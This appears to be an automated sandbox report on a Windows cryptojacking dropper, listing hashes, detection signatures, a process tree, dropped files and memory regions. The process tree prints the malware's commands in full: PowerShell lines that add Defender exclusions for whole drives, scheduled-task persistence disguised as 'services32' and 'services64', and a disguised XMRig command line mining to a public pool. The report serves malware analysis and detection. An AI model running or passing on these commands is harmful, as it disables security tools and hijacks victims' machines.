Analysis

  • max time kernel
    153s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    14-10-2021 19:12

General

  • Target

    2636b0f988e2d2129d014b870101be731b72d39e4f8ff12156b1b523a5c36c6a.exe

  • Size

    4.0MB

  • MD5

    9488b446052990dfb70a62e3efa57477

  • SHA1

    dbb32fc2c9e50ef42f4691ff21bd2b2c44d85fb5

  • SHA256

    2636b0f988e2d2129d014b870101be731b72d39e4f8ff12156b1b523a5c36c6a

  • SHA512

    fa47d55cc147f3abd5223e6d2d2261476f0e98632358d0176fc82f6a350eb17d5bce289bea7696106b9fd09f0a544360511acaada46901ac95d46fdb4d3ac918

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2636b0f988e2d2129d014b870101be731b72d39e4f8ff12156b1b523a5c36c6a.exe
    "C:\Users\Admin\AppData\Local\Temp\2636b0f988e2d2129d014b870101be731b72d39e4f8ff12156b1b523a5c36c6a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1260
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c start C:\Users\Admin\AppData\Local\Temp\bloodteam.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1260
      • C:\Users\Admin\AppData\Local\Temp\bloodteam.exe
        C:\Users\Admin\AppData\Local\Temp\bloodteam.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:872
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bloodteam.exe"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\System32\cmd.exe
            "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3168
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
              6⤵
              • Creates scheduled task(s)
              PID:980
          • C:\Windows\System32\cmd.exe
            "cmd" cmd /c "C:\Windows\system32\services32.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2120
            • C:\Windows\system32\services32.exe
              C:\Windows\system32\services32.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3252
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
                7⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3852
                • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                  "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:3656
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "/sihost32"
                    9⤵
                      PID:3956
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start C:\Users\Admin\AppData\Local\Temp\monero-bandit.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Users\Admin\AppData\Local\Temp\monero-bandit.exe
          C:\Users\Admin\AppData\Local\Temp\monero-bandit.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1020
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\monero-bandit.exe"
            4⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3488
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2036
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
                6⤵
                • Creates scheduled task(s)
                PID:2088
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Windows\system32\services64.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4028
              • C:\Windows\system32\services64.exe
                C:\Windows\system32\services64.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3272
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"
                  7⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1284
                  • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                    "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:824
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\\conhost.exe" "/sihost64"
                      9⤵
                        PID:684
                    • C:\Windows\System32\cmd.exe
                      C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db --pass=bandit --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --cinit-stealth
                      8⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3588

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
        MD5

        84f2160705ac9a032c002f966498ef74

        SHA1

        e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

        SHA256

        7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

        SHA512

        f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        MD5

        1c19c16e21c97ed42d5beabc93391fc5

        SHA1

        8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

        SHA256

        1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

        SHA512

        7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        6d904ff65084c1135dd51eabff494f94

        SHA1

        a1ba0764174b9edc82ac20106738746230a01590

        SHA256

        82db7f4f8621d839394ea5d226ecbb9bbc4e29f3081169f100da37a84408e301

        SHA512

        232688a2ad32362292d46c0d144863490efbd4370507d32ebcccfcc22e7be9f225d7b4d41033889961b785c1d75de8f7d328104b72b578d94b0a6ab383c6eca3

      • C:\Users\Admin\AppData\Local\Temp\bloodteam.exe
        MD5

        4f67ea889bd2322eddaa15259f233206

        SHA1

        d4bfd08de5b58a279016b2e52e4d6dc9f372103a

        SHA256

        63ac474c4bbda56f79e5df21f54f8f634e1ac01e32b48c8f89ccc2e2836f0ab6

        SHA512

        1e9d07da48f3dc3d92ffb4469912ca76cd399eaf07593317485772bd090a39d1901c891ea0fd6421210b051df7b99776dd1986b60e7d156fe86ff9c2e08ea978

      • C:\Users\Admin\AppData\Local\Temp\bloodteam.exe
        MD5

        4f67ea889bd2322eddaa15259f233206

        SHA1

        d4bfd08de5b58a279016b2e52e4d6dc9f372103a

        SHA256

        63ac474c4bbda56f79e5df21f54f8f634e1ac01e32b48c8f89ccc2e2836f0ab6

        SHA512

        1e9d07da48f3dc3d92ffb4469912ca76cd399eaf07593317485772bd090a39d1901c891ea0fd6421210b051df7b99776dd1986b60e7d156fe86ff9c2e08ea978

      • C:\Users\Admin\AppData\Local\Temp\monero-bandit.exe
        MD5

        342ef4f2941187bdc7f66d148be0ff75

        SHA1

        7ff601a24c42ec01ef62c097927688a431c5aa76

        SHA256

        046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

        SHA512

        84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

      • C:\Users\Admin\AppData\Local\Temp\monero-bandit.exe
        MD5

        342ef4f2941187bdc7f66d148be0ff75

        SHA1

        7ff601a24c42ec01ef62c097927688a431c5aa76

        SHA256

        046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

        SHA512

        84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

      • C:\Windows\System32\Microsoft\Libs\sihost64.exe
        MD5

        9eb9be816f6263b25bee3aa6038f58f9

        SHA1

        6c3ddf1e31c349515ea2bb7e417e888077bcdfec

        SHA256

        eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

        SHA512

        441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

      • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
        MD5

        f1c1b259af8df90eeb4ea04e57eb6625

        SHA1

        1f5973c65933fa638da7a17ef2c0b3c552b14169

        SHA256

        f4642242b53082593cd1cc6d1f97640a2f5bbfcda50c08b94f022c01dbb7e211

        SHA512

        803d133f5efe9fb0e6e8ac22ff67b3941f03cdea4678f74714b82d16f7b5072f718c891076753db39a68d91210b63a0ac291d00ae096f541873046440760c4f5

      • C:\Windows\System32\services32.exe
        MD5

        4f67ea889bd2322eddaa15259f233206

        SHA1

        d4bfd08de5b58a279016b2e52e4d6dc9f372103a

        SHA256

        63ac474c4bbda56f79e5df21f54f8f634e1ac01e32b48c8f89ccc2e2836f0ab6

        SHA512

        1e9d07da48f3dc3d92ffb4469912ca76cd399eaf07593317485772bd090a39d1901c891ea0fd6421210b051df7b99776dd1986b60e7d156fe86ff9c2e08ea978

      • C:\Windows\System32\services64.exe
        MD5

        342ef4f2941187bdc7f66d148be0ff75

        SHA1

        7ff601a24c42ec01ef62c097927688a431c5aa76

        SHA256

        046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

        SHA512

        84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

      • C:\Windows\system32\Microsoft\Libs\sihost64.exe
        MD5

        9eb9be816f6263b25bee3aa6038f58f9

        SHA1

        6c3ddf1e31c349515ea2bb7e417e888077bcdfec

        SHA256

        eec088b4b6f93002acab11f86b13e8bea3f179bb3b7008150da623d23bd6ec0e

        SHA512

        441d78848b8e1ecfa74bd37f512761d9fb43e2d46e88fb9f3791ec24a3fd3022176ba336e296f4d16f50340a3129db7ecb9770b3c7969365fa2e78ab370ea4ff

      • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        MD5

        f1c1b259af8df90eeb4ea04e57eb6625

        SHA1

        1f5973c65933fa638da7a17ef2c0b3c552b14169

        SHA256

        f4642242b53082593cd1cc6d1f97640a2f5bbfcda50c08b94f022c01dbb7e211

        SHA512

        803d133f5efe9fb0e6e8ac22ff67b3941f03cdea4678f74714b82d16f7b5072f718c891076753db39a68d91210b63a0ac291d00ae096f541873046440760c4f5

      • C:\Windows\system32\services32.exe
        MD5

        4f67ea889bd2322eddaa15259f233206

        SHA1

        d4bfd08de5b58a279016b2e52e4d6dc9f372103a

        SHA256

        63ac474c4bbda56f79e5df21f54f8f634e1ac01e32b48c8f89ccc2e2836f0ab6

        SHA512

        1e9d07da48f3dc3d92ffb4469912ca76cd399eaf07593317485772bd090a39d1901c891ea0fd6421210b051df7b99776dd1986b60e7d156fe86ff9c2e08ea978

      • C:\Windows\system32\services64.exe
        MD5

        342ef4f2941187bdc7f66d148be0ff75

        SHA1

        7ff601a24c42ec01ef62c097927688a431c5aa76

        SHA256

        046976da5783b0425976084bc16ababee1094e98a1f0648fc10c91dcf49bc395

        SHA512

        84d9c5c7b83481e18efeecf8814bd050fd283dc1408a9a02fdc786ae2f8f08355ff87e24ab47a75e08291f0d75e8ae6747bb247e6a8859e8662d1999454605b2

      • memory/684-740-0x0000020844CA0000-0x0000020844CA2000-memory.dmp
        Filesize

        8KB

      • memory/684-741-0x0000020844CA3000-0x0000020844CA5000-memory.dmp
        Filesize

        8KB

      • memory/684-731-0x000002082A6D0000-0x000002082A6D6000-memory.dmp
        Filesize

        24KB

      • memory/684-742-0x0000020844CA6000-0x0000020844CA7000-memory.dmp
        Filesize

        4KB

      • memory/824-704-0x0000000000000000-mapping.dmp
      • memory/872-119-0x0000000000000000-mapping.dmp
      • memory/876-135-0x0000000007A70000-0x0000000007A71000-memory.dmp
        Filesize

        4KB

      • memory/876-125-0x0000000002C70000-0x0000000002C71000-memory.dmp
        Filesize

        4KB

      • memory/876-138-0x0000000002C70000-0x0000000002C71000-memory.dmp
        Filesize

        4KB

      • memory/876-145-0x0000000008F80000-0x0000000008FB3000-memory.dmp
        Filesize

        204KB

      • memory/876-152-0x0000000008F60000-0x0000000008F61000-memory.dmp
        Filesize

        4KB

      • memory/876-157-0x0000000009210000-0x0000000009211000-memory.dmp
        Filesize

        4KB

      • memory/876-158-0x000000007F680000-0x000000007F681000-memory.dmp
        Filesize

        4KB

      • memory/876-159-0x0000000004753000-0x0000000004754000-memory.dmp
        Filesize

        4KB

      • memory/876-160-0x00000000094B0000-0x00000000094B1000-memory.dmp
        Filesize

        4KB

      • memory/876-133-0x0000000007A00000-0x0000000007A01000-memory.dmp
        Filesize

        4KB

      • memory/876-136-0x00000000083E0000-0x00000000083E1000-memory.dmp
        Filesize

        4KB

      • memory/876-132-0x0000000007820000-0x0000000007821000-memory.dmp
        Filesize

        4KB

      • memory/876-131-0x0000000007040000-0x0000000007041000-memory.dmp
        Filesize

        4KB

      • memory/876-130-0x0000000004752000-0x0000000004753000-memory.dmp
        Filesize

        4KB

      • memory/876-129-0x0000000004750000-0x0000000004751000-memory.dmp
        Filesize

        4KB

      • memory/876-128-0x0000000007180000-0x0000000007181000-memory.dmp
        Filesize

        4KB

      • memory/876-127-0x0000000004700000-0x0000000004701000-memory.dmp
        Filesize

        4KB

      • memory/876-134-0x0000000007C00000-0x0000000007C01000-memory.dmp
        Filesize

        4KB

      • memory/876-126-0x0000000002C70000-0x0000000002C71000-memory.dmp
        Filesize

        4KB

      • memory/876-118-0x0000000000000000-mapping.dmp
      • memory/876-137-0x0000000008250000-0x0000000008251000-memory.dmp
        Filesize

        4KB

      • memory/980-637-0x0000000000000000-mapping.dmp
      • memory/1020-120-0x0000000000000000-mapping.dmp
      • memory/1220-115-0x0000000000000000-mapping.dmp
      • memory/1260-116-0x0000000000000000-mapping.dmp
      • memory/1260-482-0x0000000004493000-0x0000000004494000-memory.dmp
        Filesize

        4KB

      • memory/1260-481-0x000000007EC30000-0x000000007EC31000-memory.dmp
        Filesize

        4KB

      • memory/1260-387-0x0000000004492000-0x0000000004493000-memory.dmp
        Filesize

        4KB

      • memory/1260-385-0x0000000004490000-0x0000000004491000-memory.dmp
        Filesize

        4KB

      • memory/1260-374-0x0000000000000000-mapping.dmp
      • memory/1284-707-0x000001F554F40000-0x000001F554F42000-memory.dmp
        Filesize

        8KB

      • memory/1284-708-0x000001F554F43000-0x000001F554F45000-memory.dmp
        Filesize

        8KB

      • memory/1284-709-0x000001F554F46000-0x000001F554F47000-memory.dmp
        Filesize

        4KB

      • memory/1656-117-0x0000000000000000-mapping.dmp
      • memory/2036-658-0x0000000000000000-mapping.dmp
      • memory/2088-659-0x0000000000000000-mapping.dmp
      • memory/2120-660-0x0000000000000000-mapping.dmp
      • memory/2180-639-0x000002DEAF133000-0x000002DEAF135000-memory.dmp
        Filesize

        8KB

      • memory/2180-640-0x000002DEAF136000-0x000002DEAF137000-memory.dmp
        Filesize

        4KB

      • memory/2180-626-0x000002DE94840000-0x000002DE94A31000-memory.dmp
        Filesize

        1.9MB

      • memory/2180-638-0x000002DEAF130000-0x000002DEAF132000-memory.dmp
        Filesize

        8KB

      • memory/3168-636-0x0000000000000000-mapping.dmp
      • memory/3252-662-0x0000000000000000-mapping.dmp
      • memory/3272-668-0x0000000000000000-mapping.dmp
      • memory/3488-651-0x0000021E503A0000-0x0000021E503A2000-memory.dmp
        Filesize

        8KB

      • memory/3488-649-0x0000021E35AF0000-0x0000021E35CFC000-memory.dmp
        Filesize

        2.0MB

      • memory/3488-652-0x0000021E503A3000-0x0000021E503A5000-memory.dmp
        Filesize

        8KB

      • memory/3488-653-0x0000021E503A6000-0x0000021E503A7000-memory.dmp
        Filesize

        4KB

      • memory/3588-712-0x00000001402F327C-mapping.dmp
      • memory/3588-717-0x0000000140000000-0x0000000140763000-memory.dmp
        Filesize

        7.4MB

      • memory/3588-718-0x000001B44DC60000-0x000001B44DC80000-memory.dmp
        Filesize

        128KB

      • memory/3588-744-0x000001B44DCC0000-0x000001B44DCE0000-memory.dmp
        Filesize

        128KB

      • memory/3588-743-0x000001B44DC80000-0x000001B44DCA0000-memory.dmp
        Filesize

        128KB

      • memory/3656-684-0x0000000000000000-mapping.dmp
      • memory/3852-689-0x0000021360706000-0x0000021360707000-memory.dmp
        Filesize

        4KB

      • memory/3852-688-0x0000021360703000-0x0000021360705000-memory.dmp
        Filesize

        8KB

      • memory/3852-687-0x0000021360700000-0x0000021360702000-memory.dmp
        Filesize

        8KB

      • memory/3956-728-0x0000018D40550000-0x0000018D40552000-memory.dmp
        Filesize

        8KB

      • memory/3956-730-0x0000018D40556000-0x0000018D40557000-memory.dmp
        Filesize

        4KB

      • memory/3956-729-0x0000018D40553000-0x0000018D40555000-memory.dmp
        Filesize

        8KB

      • memory/3956-727-0x0000018D261A0000-0x0000018D261A6000-memory.dmp
        Filesize

        24KB

      • memory/4028-665-0x0000000000000000-mapping.dmp